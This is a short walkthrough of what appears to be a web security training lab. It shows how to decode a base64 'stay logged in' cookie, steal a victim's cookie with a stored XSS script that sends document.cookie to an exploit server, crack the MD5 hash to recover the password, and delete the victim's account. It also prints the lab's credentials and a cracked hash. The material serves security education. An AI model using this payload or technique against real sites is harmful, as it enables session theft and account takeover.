Offline password cracking
Lab description
Walkthrough
Step 1: Initial Analysis
Log in using the provided credentials (wiener:peter) and ensure the "Stay logged in" checkbox is selected.
After logging in, inspect the HTTP request for the stay-logged-in cookie. The token appears to be encoded.
After logging in, inspect the HTTP request for the stay-logged-in cookie. The token appears to be encoded.
Step 2: Decoding the Cookie
Decode the token using Base64.
The structure of the token is revealed as:
username:MD5(password)
Decoded Token Example:
wiener:51dc30ddc473d43a6011e9ebba6ca770
Step 3: Stealing Carlos's Cookie
The goal now is to steal Carlos's stay-logged-in cookie using the XSS vulnerability in the comment section.
Submit the following XSS payload in the comment field:
<script>
document.location='//<your-exploit-server>/'+document.cookie;
</script>What this payload does is it sends the users cookies to our exploit server
When Carlos views the comment, his cookie is sent to your exploit server.
Step 4: Extracting Carlos's Token
Access the exploit server logs to retrieve Carlos's stay-logged-in cookie.
Carlos's Token Example:
Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz
Decode Carlos's token using Base64:
carlos:26323c16d5f4dabff3bb136f2460a943
Decoding this token, we find it's Carlos's token base64{carlos:MD5(password)}
Step 5: Cracking Carlos's Password
Use an MD5 cracker (in this case Crackstation) to crack the hash.
The hash 26323c16d5f4dabff3bb136f2460a943 resolves to:
onceuponatime
Step 6: Logging in as Carlos
Use Carlos's username and cracked password (carlos:onceuponatime) to log in.
Navigate to the "My Account" page and select "Delete account."
Enter the password when prompted and confirm the deletion.
To solve this lab we have to delete his account so we just click on that and use the password we know and that's it lab done
Last updated
Was this helpful?